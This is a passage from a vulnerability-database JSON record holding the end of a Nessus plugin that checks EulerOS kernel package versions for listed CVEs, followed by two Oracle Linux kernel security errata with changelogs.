a parent process present a substantial\n operational threat.(CVE-2020-12826)\n\n - The __mptctl_ioctl function in\n drivers/message/fusion/mptctl.c in the Linux kernel\n before 5.4.14 allows local users to hold an incorrect\n lock during the ioctl operation and trigger a race\n condition, i.e., a 'double fetch' vulnerability, aka\n CID-28d76df18f0a. NOTE: the vendor states 'The security\n impact of this bug is not as bad as it could have been\n because these operations are all privileged and root\n already has enormous destructive\n power.'(CVE-2020-12652)\n\n - An issue was found in Linux kernel before 5.5.4. The\n mwifiex_cmd_append_vsie_tlv() function in\n drivers/net/wireless/marvell/mwifiex/scan.c allows\n local users to gain privileges or cause a denial of\n service because of an incorrect memcpy and buffer\n overflow, aka CID-b70261a288ea.(CVE-2020-12653)\n\n - An issue was found in Linux kernel before 5.5.4.\n mwifiex_ret_wmm_get_status() in\n drivers/net/wireless/marvell/mwifiex/wmm.c allows a\n remote AP to trigger a heap-based buffer overflow\n because of an incorrect memcpy, aka\n CID-3a9b153c5591.(CVE-2020-12654)\n\n - An issue was discovered in xfs_agf_verify in\n fs/xfs/libxfs/xfs_alloc.c in the Linux kernel through\n 5.6.10. Attackers may trigger a sync of excessive\n duration via an XFS v5 image with crafted metadata, aka\n CID-d0c7feaf8767.(CVE-2020-12655)\n\n - A flaw was found in the Linux kernel's implementation\n of GRO in versions before 5.2. This flaw allows an\n attacker with local access to crash the\n system.(CVE-2020-10720)\n\n - An issue was discovered in the Linux kernel through\n 5.6.11. sg_write lacks an sg_remove_request call in a\n certain failure case, aka\n CID-83c6f2390040.(CVE-2020-12770)\n\n - In the Linux kernel before 5.4.12,\n drivers/input/input.c has out-of-bounds writes via a\n crafted keycode table, as demonstrated by\n input_set_keycode, aka\n CID-cb222aed03d7.(CVE-2019-20636)\n\n - An issue was discovered in the stv06xx subsystem in the\n Linux kernel before 5.6.1.\n drivers/media/usb/gspca/stv06xx/stv06xx.c and\n drivers/media/usb/gspca/stv06xx/stv06xx_pb0100.c\n mishandle invalid descriptors, as demonstrated by a\n NULL pointer dereference, aka\n CID-485b06aadb93.(CVE-2020-11609)\n\n - In the netlink driver, there is a possible out of\n bounds write due to a race condition. This could lead\n to local escalation of privilege with System execution\n privileges needed. User interaction is not needed for\n exploitation.Product: AndroidVersions: Android\n kernelAndroid ID: A-65025077(CVE-2020-0066)\n\n - In the Linux kernel before 5.5.8, get_raw_socket in\n drivers/vhost/net.c lacks validation of an sk_family\n field, which might allow attackers to trigger kernel\n stack corruption via crafted system\n calls.(CVE-2020-10942)\n\n - An issue was discovered in slc_bump in\n drivers/net/can/slcan.c in the Linux kernel through\n 5.6.2. It allows attackers to read uninitialized\n can_frame data, potentially containing sensitive\n information from kernel stack memory, if the\n configuration lacks CONFIG_INIT_STACK_ALL, aka\n CID-b9258a2cece4.(CVE-2020-11494)\n\n - An issue was discovered in the Linux kernel through\n 5.6.2. mpol_parse_str in mm/mempolicy.c has a\n stack-based out-of-bounds write because an empty\n nodelist is mishandled during mount option parsing, aka\n CID-aa9f7d5172fa. NOTE: Someone in the security\n community disagrees that this is a vulnerability\n because the issue 'is a bug in parsing mount options\n which can only be specified by a privileged user, so\n triggering the bug does not grant any powers not\n already held.'.(CVE-2020-11565)\n\n - An issue was discovered in the Linux kernel before\n 5.6.1. drivers/media/usb/gspca/ov519.c allows NULL\n pointer dereferences in ov511_mode_init_regs and\n ov518_mode_init_regs when there are zero endpoints, aka\n CID-998912346c0d.(CVE-2020-11608)\n\n - The kernel in Red Hat Enterprise Linux 7 and MRG-2 does\n not clear garbage data for SG_IO buffer, which may\n leaking sensitive information to\n userspace.(CVE-2014-8181)\n\n - In the Linux kernel 5.0.21, mounting a crafted ext4\n filesystem image, performing some operations, and\n unmounting can lead to a use-after-free in\n ext4_put_super in fs/ext4/super.c, related to\n dump_orphan_list in fs/ext4/super.c.(CVE-2019-19447)\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the EulerOS security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\");\n # https://developer.huaweicloud.com/ict/en/site-euleros/euleros/security-advisories/EulerOS-SA-2020-2150\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?e6bf6b88\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected kernel packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:P/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2020-14331\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/09/28\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/09/28\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:kernel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:kernel-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:kernel-debuginfo-common-x86_64\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:kernel-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:kernel-headers\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:kernel-tools\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:kernel-tools-libs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:perf\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:python-perf\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:huawei:euleros:2.0\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Huawei Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2020-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/EulerOS/release\", \"Host/EulerOS/rpm-list\", \"Host/EulerOS/sp\");\n script_exclude_keys(\"Host/EulerOS/uvp_version\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nrelease = get_kb_item(\"Host/EulerOS/release\");\nif (isnull(release) || release !~ \"^EulerOS\") audit(AUDIT_OS_NOT, \"EulerOS\");\nif (release !~ \"^EulerOS release 2\\.0(\\D|$)\") audit(AUDIT_OS_NOT, \"EulerOS 2.0\");\n\nsp = get_kb_item(\"Host/EulerOS/sp\");\nif (isnull(sp) || sp !~ \"^(3)$\") audit(AUDIT_OS_NOT, \"EulerOS 2.0 SP3\");\n\nuvp = get_kb_item(\"Host/EulerOS/uvp_version\");\nif (!empty_or_null(uvp)) audit(AUDIT_OS_NOT, \"EulerOS 2.0 SP3\", \"EulerOS UVP \" + uvp);\n\nif (!get_kb_item(\"Host/EulerOS/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"aarch64\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"EulerOS\", cpu);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_ARCH_NOT, \"i686 / x86_64\", cpu);\n\nflag = 0;\n\npkgs = [\"kernel-3.10.0-514.44.5.10.h275\",\n \"kernel-debuginfo-3.10.0-514.44.5.10.h275\",\n \"kernel-debuginfo-common-x86_64-3.10.0-514.44.5.10.h275\",\n \"kernel-devel-3.10.0-514.44.5.10.h275\",\n \"kernel-headers-3.10.0-514.44.5.10.h275\",\n \"kernel-tools-3.10.0-514.44.5.10.h275\",\n \"kernel-tools-libs-3.10.0-514.44.5.10.h275\",\n \"perf-3.10.0-514.44.5.10.h275\",\n \"python-perf-3.10.0-514.44.5.10.h275\"];\n\nforeach (pkg in pkgs)\n if (rpm_check(release:\"EulerOS-2.0\", sp:\"3\", reference:pkg)) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"kernel\");\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "oraclelinux": [{"lastseen": "2020-11-12T03:28:16", "bulletinFamily": "unix", "cvelist": ["CVE-2020-14331", "CVE-2020-12352", "CVE-2019-20811", "CVE-2020-12351"], "description": "[3.10.0-1160.6.1.OL7]\n- Oracle Linux certificates (Ilya Okomin)\n- Oracle Linux RHCK Module Signing Key was compiled into kernel (olkmod_signing_key.x509)(alexey.petrenko@oracle.com)\n- Update x509.genkey [Orabug: 24817676]\n- Conflict with shim-ia32 and shim-x64 <= 15-2.0.3\n[3.10.0-1160.6.1]\n- [net] netfilter: nf_queue: place bridge physports into queue_entry struct (Florian Westphal) [1885682]\n- [net] netfilter: nf_queue: do not release refcouts until nf_reinject is done (Florian Westphal) [1885682]\n- [net] netfilter: nf_queue: make nf_queue_entry_release_refs static (Florian Westphal) [1885682]\n- [net] bluetooth: l2cap: Fix calling sk_filter on non-socket based channel (Gopal Tiwari) [1888253] {CVE-2020-12351}\n- [net] bluetooth: a2mp: Fix not initializing all members (Gopal Tiwari) [1888797] {CVE-2020-12352}\n[3.10.0-1160.5.1]\n- [x86] x86/PCI: Mark Intel C620 MROMs as having non-compliant BARs (Myron Stowe) [1849223]\n- [kernel] uprobes: Change handle_swbp() to send SIGTRAP with si_code=SI_KERNEL, to fix GDB regression (Oleg Nesterov) [1861396]\n- [video] vgacon: Fix for missing check in scrollback handling (Lyude Paul) [1859468] {CVE-2020-14331}\n- [pci] hv: Retry PCI bus D0 entry on invalid device state (Mohammed Gamal) [1846667]\n- [pci] hv: Fix the PCI HyperV probe failure path to release resource properly (Mohammed Gamal) [1846667]\n- [x86] xen: Add call of speculative_store_bypass_ht_init() to PV paths (Vladis Dronov) [1882468]\n- [powerpc] powerpc/smp: Use nid as fallback for package_id (Desnes Augusto Nunes do Rosario) [1826306]\n- [powerpc] powerpc/smp: Add Power9 scheduler topology (Desnes Augusto Nunes do Rosario) [1826306]\n- [kernel] sched: Add a new SD_SHARE_POWERDOMAIN for sched_domain (Desnes Augusto Nunes do Rosario) [1826306]\n- [powerpc] sched, powerpc: Create a dedicated topology table (Desnes Augusto Nunes do Rosario) [1826306]\n- [s390] sched, s390: Create a dedicated topology table (Desnes Augusto Nunes do Rosario) [1826306]\n- [s390] s390/topology: Remove call to update_cpu_masks() (Desnes Augusto Nunes do Rosario) [1826306]\n- [powerpc] powerpc/smp: Add cpu_l2_cache_map (Desnes Augusto Nunes do Rosario) [1826306]\n- [powerpc] powerpc/smp: Rework CPU topology construction (Desnes Augusto Nunes do Rosario) [1826306]\n- [powerpc] powerpc/smp: Use cpu_to_chip_id() to find core siblings (Desnes Augusto Nunes do Rosario) [1826306]\n- [powerpc] powerpc, hotplug: Avoid to touch non-existent cpumasks (Desnes Augusto Nunes do Rosario) [1826306]\n[3.10.0-1160.4.1]\n- [block] virtio-blk: handle block_device_operations callbacks after hot unplug (Stefan Hajnoczi) [1811893]\n- [scsi] Revert 'scsi: qla2xxx: Fix crash on qla2x00_mailbox_command' (Nilesh Javali) [1826127]\n- [scsi] scsi: qla2xxx: Fix stale mem access on driver unload (Nilesh Javali) [1826127]\n- [scsi] scsi: qedf: Fix crash when MFW calls for protocol stats while function is still probing (Nilesh Javali) [1836443]\n- [scsi] scsi: qedf: Keep track of num of pending flogi (Nilesh Javali) [1836443]\n- [scsi] scsi: qedf: Fix race betwen fipvlan request and response path (Nilesh Javali) [1836443]\n- [scsi] scsi: qedf: Decrease the LL2 MTU size to 2500 (Nilesh Javali) [1836443]\n- [scsi] scsi: qedf: Check for module unloading bit before processing link update AEN (Nilesh Javali) [1836443]\n- [scsi] scsi: qedf: Initiator fails to re-login to switch after link down (Nilesh Javali) [1836443]\n- [scsi] scsi: qedf: Fix crash during sg_reset (Nilesh Javali) [1836443]\n- [scsi] scsi: qedf: Stop sending fipvlan request on unload (Nilesh Javali) [1836443]\n- [message] scsi: mptscsih: Fix read sense data size (Tomas Henzl) [1829803]\n- [scsi] scsi: megaraid_sas: Clear affinity hint (Tomas Henzl) [1828312]\n[3.10.0-1160.3.1]\n- [net] net-sysfs: Call dev_hold always in rx_queue_add_kobject (Hangbin Liu) [1846454] {CVE-2019-20811}\n- [net] net-sysfs: Call dev_hold always in netdev_queue_add_kobject (Hangbin Liu) [1846454] {CVE-2019-20811}\n- [net] net-sysfs: call dev_hold if kobject_init_and_add success (Hangbin Liu) [1846454] {CVE-2019-20811}\n- [netdrv] macvlan: Change status when lower device goes down (Hangbin Liu) [1848950]\n- [netdrv] macvlan: make operstate and carrier more accurate (Hangbin Liu) [1848950]\n- [infiniband] RDMA/ipoib: Fix ABBA deadlock with ipoib_reap_ah() (Kamal Heib) [1858707]\n- [infiniband] RDMA/ipoib: Return void from ipoib_ib_dev_stop() (Kamal Heib) [1858707]\n- [net] tcp: limit sk_write_qlen based on sndbuf size (Florian Westphal) [1847765]\n- [netdrv] net/mlx5e: Modify uplink state on interface up/down (Alaa Hleihel) [1733181]\n- [netdrv] net/mlx5: E-Switch, Disable esw manager vport correctly (Alaa Hleihel) [1733181]\n- [netdrv] net/mlx5: E-Switch, Properly refer to host PF vport as other vport (Alaa Hleihel) [1733181]", "edition": 1, "modified": "2020-11-11T00:00:00", "published": "2020-11-11T00:00:00", "id": "ELSA-2020-5023", "href": "http://linux.oracle.com/errata/ELSA-2020-5023.html", "title": "kernel security and bug fix update", "type": "oraclelinux", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-10-06T22:49:41", "bulletinFamily": "unix", "cvelist": ["CVE-2019-5108", "CVE-2019-7222", "CVE-2016-10906", "CVE-2019-15218", "CVE-2020-25285", "CVE-2019-10639", "CVE-2019-15505", "CVE-2019-19052", "CVE-2019-19062", "CVE-2020-10720", "CVE-2020-10732", "CVE-2019-19768", "CVE-2019-19965", "CVE-2020-10769", "CVE-2019-3874", "CVE-2017-8924", "CVE-2019-17075", "CVE-2020-14331", "CVE-2019-15927", "CVE-2019-20812", "CVE-2019-16746", "CVE-2019-19535", "CVE-2020-25284", "CVE-2020-1749", "CVE-2019-7221", "CVE-2020-10751", "CVE-2018-16884", "CVE-2019-10638", "CVE-2019-18885", "CVE-2018-20856", "CVE-2019-11487", "CVE-2017-8925", "CVE-2019-6974", "CVE-2019-14898", "CVE-2020-25212", "CVE-2019-19073", "CVE-2020-14314", "CVE-2017-16644", "CVE-2019-3846", "CVE-2019-20811", "CVE-2016-10905", "CVE-2018-9415", "CVE-2017-16528", "CVE-2019-20054", "CVE-2019-19049", "CVE-2019-20096"], "description": "[4.1.12-124.43.4]\n- kvm: fix kvm_ioctl_create_device() reference counting (CVE-2019-6974) (Jann Horn) [Orabug: 29434845] {CVE-2019-6974}\n- KVM: nVMX: unconditionally cancel preemption timer in free_nested (CVE-2019-7221) (Peter Shier) [Orabug: 29434898] {CVE-2019-7221}\n- KVM: x86: work around leak of uninitialized stack contents (CVE-2019-7222) (Paolo Bonzini) [Orabug: 29434924] {CVE-2019-7222}\n- net: arc_emac: fix koops caused by sk_buff free (Alexander Kochetkov) [Orabug: 30254239] {CVE-2016-10906}\n- GFS2: don't set rgrp gl_object until it's inserted into rgrp tree (Bob Peterson) [Orabug: 30254251] {CVE-2016-10905}\n- GFS2: Fix rgrp end rounding problem for bsize < page size (Bob Peterson) [Orabug: 30254251] {CVE-2016-10905}\n- x86/apic/msi: update address_hi on set msi affinity (Joe Jin) [Orabug: 31477035] \n- x86/apic/msi: check and sync apic IRR on msi_set_affinity (Joe Jin) [Orabug: 31477035] \n- net: ipv6_stub: use ip6_dst_lookup_flow instead of ip6_dst_lookup (Sabrina Dubroca) [Orabug: 31872821] {CVE-2020-1749}\n- nfs: Fix getxattr kernel panic and memory overflow (Jeffrey Mitchell) [Orabug: 31872910] {CVE-2020-25212}\n- rbd: require global CAP_SYS_ADMIN for mapping and unmapping (Ilya Dryomov) [Orabug: 31884169] {CVE-2020-25284}\n- mm/hugetlb: fix a race between hugetlb sysctl handlers (Muchun Song) [Orabug: 31884239] {CVE-2020-25285}\n- ext4: fix potential negative array index in do_split() (Eric Sandeen) [Orabug: 31895331] {CVE-2020-14314}\n[4.1.12-124.43.3]\n- ARM: amba: Fix race condition with driver_override (Geert Uytterhoeven) [Orabug: 29671212] {CVE-2018-9415}\n- block: blk_init_allocated_queue() set q->fq as NULL in the fail case (xiao jin) [Orabug: 30120513] {CVE-2018-20856}\n- USB: serial: omninet: fix reference leaks at open (Johan Hovold) [Orabug: 30484761] {CVE-2017-8925}\n- nl80211: validate beacon head (Johannes Berg) [Orabug: 30556264] {CVE-2019-16746}\n- cfg80211: Use const more consistently in for_each_element macros (Jouni Malinen) [Orabug: 30556264] {CVE-2019-16746}\n- cfg80211: add and use strongly typed element iteration macros (Johannes Berg) [Orabug: 30556264] {CVE-2019-16746}\n- cfg80211: add helper to find an IE that matches a byte-array (Luca Coelho) [Orabug: 30556264] {CVE-2019-16746}\n- cfg80211: allow finding vendor with OUI without specifying the OUI type (Emmanuel Grumbach) [Orabug: 30556264] {CVE-2019-16746}\n- dccp: Fix memleak in __feat_register_sp (YueHaibing) [Orabug: 30732821] {CVE-2019-20096}\n- fs/proc/proc_sysctl.c: Fix a NULL pointer dereference (YueHaibing) [Orabug: 30732938] {CVE-2019-20054}\n- fs/proc/proc_sysctl.c: fix NULL pointer dereference in put_links (YueHaibing) [Orabug: 30732938] {CVE-2019-20054}\n- scsi: libsas: stop discovering if oob mode is disconnected (Jason Yan) [Orabug: 30770913] {CVE-2019-19965}\n- kernel/sysctl.c: fix out-of-bounds access when setting file-max (Will Deacon) [Orabug: 31350720] {CVE-2019-14898}\n- sysctl: handle overflow for file-max (Christian Brauner) [Orabug: 31350720] {CVE-2019-14898}\n- ath9k_htc: release allocated buffer if timed out (Navid Emamdoost) [Orabug: 31351572] {CVE-2019-19073}\n- can: gs_usb: gs_can_open(): prevent memory leak (Navid Emamdoost) [Orabug: 31351682] {CVE-2019-19052}\n- ALSA: usb-audio: Avoid access before bLength check in build_audio_procunit() (Takashi Iwai) [Orabug: 31351837] {CVE-2019-15927}\n- media: usb: siano: Fix general protection fault in smsusb (Alan Stern) [Orabug: 31351875] {CVE-2019-15218}\n- crypto: vmac - separate tfm and request context (Eric Biggers) [Orabug: 31584410] \n- SUNRPC: Fix a race with XPRT_CONNECTING (Trond Myklebust) [Orabug: 31796770] \n- SUNRPC: Fix disconnection races (Trond Myklebust) [Orabug: 31796770] \n- SUNRPC: Add a helper to wake up a sleeping rpc_task and set its status (Trond Myklebust) [Orabug: 31796770] \n- SUNRPC: Reduce latency when send queue is congested (Trond Myklebust) [Orabug: 31796770] \n- SUNRPC: RPC transport queue must be low latency (Trond Myklebust) [Orabug: 31796770] \n- SUNRPC: Fix a potential race in xprt_connect() (Trond Myklebust) [Orabug: 31796770] \n- SUNRPC: ensure correct error is reported by xs_tcp_setup_socket() (NeilBrown) [Orabug: 31796770] \n- SUNRPC: Fix races between socket connection and destroy code (Trond Myklebust) [Orabug: 31796770] \n- SUNRPC: Prevent SYN+SYNACK+RST storms (Trond Myklebust) [Orabug: 31796770] \n- SUNRPC: Report TCP errors to the caller (Trond Myklebust) [Orabug: 31796770] \n- SUNRPC: Ensure we release the TCP socket once it has been closed (Trond Myklebust) [Orabug: 31796770] \n- net-gro: fix use-after-free read in napi_gro_frags() (Eric Dumazet) [Orabug: 31856195] {CVE-2020-10720}\n- PCI: Probe bridge window attributes once at enumeration-time (Bjorn Helgaas) [Orabug: 31867577]\n[4.1.12-124.43.2]\n- ALSA: seq: Cancel pending autoload work at unbinding device (Takashi Iwai) [Orabug: 31352045] {CVE-2017-16528}\n- USB: serial: io_ti: fix information leak in completion handler (Johan Hovold) [Orabug: 31352084] {CVE-2017-8924}\n- sample-trace-array: Fix sleeping function called from invalid context (Kefeng Wang) [Orabug: 31543032] \n- sample-trace-array: Remove trace_array 'sample-instance' (Kefeng Wang) [Orabug: 31543032] \n- tracing: Sample module to demonstrate kernel access to Ftrace instances. (Divya Indi) [Orabug: 31543032] \n- tracing: Adding new functions for kernel access to Ftrace instances (Aruna Ramakrishna) [Orabug: 31543032] \n- tracing: Adding NULL checks for trace_array descriptor pointer (Divya Indi) [Orabug: 31543032] \n- tracing: Verify if trace array exists before destroying it. (Divya Indi) [Orabug: 31543032] \n- tracing: Declare newly exported APIs in include/linux/trace.h (Divya Indi) [Orabug: 31543032] \n- tracing: Kernel access to Ftrace instances (Divya Indi) [Orabug: 31543032]\n[4.1.12-124.43.1]\n- blktrace: Protect q->blk_trace with RCU (Jan Kara) [Orabug: 31123576] {CVE-2019-19768}\n- media: technisat-usb2: break out of loop at end of buffer (Sean Young) [Orabug: 31224554] {CVE-2019-15505}\n- btrfs: merge btrfs_find_device and find_device (Anand Jain) [Orabug: 31351746] {CVE-2019-18885}\n- RDMA/cxgb4: Do not dma memory off of the stack (Greg KH) [Orabug: 31351783] {CVE-2019-17075}\n- mwifiex: Abort at too short BSS descriptor element (Takashi Iwai) [Orabug: 31351916] {CVE-2019-3846}\n- mwifiex: Fix possible buffer overflows at parsing bss descriptor (Takashi Iwai) [Orabug: 31351916] {CVE-2019-3846} {CVE-2019-3846}\n- repair kABI breakage from 'fs: prevent page refcount overflow in pipe_buf_get' (Dan Duval) [Orabug: 31351941] {CVE-2019-11487}\n- mm: prevent get_user_pages() from overflowing page refcount (Linus Torvalds) [Orabug: 31351941] {CVE-2019-11487}\n- mm: add 'try_get_page()' helper function (Linus Torvalds) [Orabug: 31351941] {CVE-2019-11487}\n- fs: prevent page refcount overflow in pipe_buf_get (Matthew Wilcox) [Orabug: 31351941] {CVE-2019-11487}\n- mm: make page ref count overflow check tighter and more explicit (Linus Torvalds) [Orabug: 31351941] {CVE-2019-11487}\n- sctp: implement memory accounting on tx path (Xin Long) [Orabug: 31351960] {CVE-2019-3874}\n- sunrpc: use SVC_NET() in svcauth_gss_* functions (Vasily Averin) [Orabug: 31351995] {CVE-2018-16884}\n- sunrpc: use-after-free in svc_process_common() (Vasily Averin) [Orabug: 31351995] {CVE-2018-16884}\n- af_packet: set defaule value for tmo (Mao Wenan) [Orabug: 31439107] {CVE-2019-20812}\n- selinux: properly handle multiple messages in selinux_netlink_send() (Paul Moore) [Orabug: 31439369] {CVE-2020-10751}\n- selinux: Print 'sclass' as string when unrecognized netlink message occurs (Marek Milkovic) [Orabug: 31439369] {CVE-2020-10751}\n- mac80211: Do not send Layer 2 Update frame before authorization (Jouni Malinen) [Orabug: 31473652] {CVE-2019-5108}\n- cfg80211/mac80211: make ieee80211_send_layer2_update a public function (Dedy Lansky) [Orabug: 31473652] {CVE-2019-5108}\n- crypto: authenc - fix parsing key with misaligned rta_len (Eric Biggers) [Orabug: 31535529] {CVE-2020-10769}\n- vgacon: Fix for missing check in scrollback handling (Yunhai Zhang) [Orabug: 31705121] {CVE-2020-14331} {CVE-2020-14331}\n- rename kABI whitelists to lockedlists (Dan Duval) [Orabug: 31783151]\n[4.1.12-124.42.4]\n- rds/ib: Make i_{recv,send}_hdrs non-contigious (Hans Westgaard Ry) [Orabug: 30634865] \n- md: get sysfs entry after redundancy attr group create (Junxiao Bi) [Orabug: 31683116] \n- md: fix deadlock causing by sysfs_notify (Junxiao Bi) [Orabug: 31683116]\n[4.1.12-124.42.3]\n- can: peak_usb: pcan_usb_fd: Fix info-leaks to USB devices (Tomas Bortoli) [Orabug: 31351221] {CVE-2019-19535}\n- media: hdpvr: Fix an error handling path in hdpvr_probe() (Arvind Yadav) [Orabug: 31352053] {CVE-2017-16644}\n- fs/binfmt_misc.c: do not allow offset overflow (Thadeu Lima de Souza Cascardo) [Orabug: 31588258] \n- clear inode and truncate pages before enqueuing for async inactivation (Gautham Ananthakrishna) [Orabug: 31744270]\n[4.1.12-124.42.2]\n- mm: create alloc_last_chance debugfs entries (Mike Kravetz) [Orabug: 31295499] \n- mm: perform 'last chance' reclaim efforts before allocation failure (Mike Kravetz) [Orabug: 31295499] \n- mm: let page allocation slowpath retry 'order' times (Mike Kravetz) [Orabug: 31295499] \n- fix kABI breakage from 'netns: provide pure entropy for net_hash_mix()' (Dan Duval) [Orabug: 31351904] {CVE-2019-10638} {CVE-2019-10639}\n- netns: provide pure entropy for net_hash_mix() (Eric Dumazet) [Orabug: 31351904] {CVE-2019-10638} {CVE-2019-10639}\n- hrtimer: Annotate lockless access to timer->base (Eric Dumazet) [Orabug: 31380495] \n- rds: ib: Revert 'net/rds: Avoid stalled connection due to CM REQ retries' (Hakon Bugge) [Orabug: 31648141] \n- rds: Clear reconnect pending bit (Hakon Bugge) [Orabug: 31648141] \n- RDMA/netlink: Do not always generate an ACK for some netlink operations (Hakon Bugge) [Orabug: 31666975] \n- genirq/proc: Return proper error code when irq_set_affinity() fails (Wen Yaxng) [Orabug: 31723450]\n[4.1.12-124.42.1]\n- fs/binfmt_elf.c: allocate initialized memory in fill_thread_core_info() (Alexander Potapenko) [Orabug: 31350639] {CVE-2020-10732}\n- crypto: user - fix memory leak in crypto_report (Navid Emamdoost) [Orabug: 31351640] {CVE-2019-19062}\n- of: unittest: fix memory leak in unittest_data_add (Navid Emamdoost) [Orabug: 31351702] {CVE-2019-19049}\n- IB/sa: Resolv use-after-free in ib_nl_make_request() (Divya Indi) [Orabug: 31656992] \n- net-sysfs: call dev_hold if kobject_init_and_add success (YueHaibing) [Orabug: 31687545] {CVE-2019-20811}", "edition": 1, "modified": "2020-10-06T00:00:00", "published": "2020-10-06T00:00:00", "id": "ELSA-2020-5866", "href": "http://linux.oracle.com/errata/ELSA-2020-5866.html", "title": "Unbreakable Enterprise kernel security update", "type": "oraclelinux", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}]}
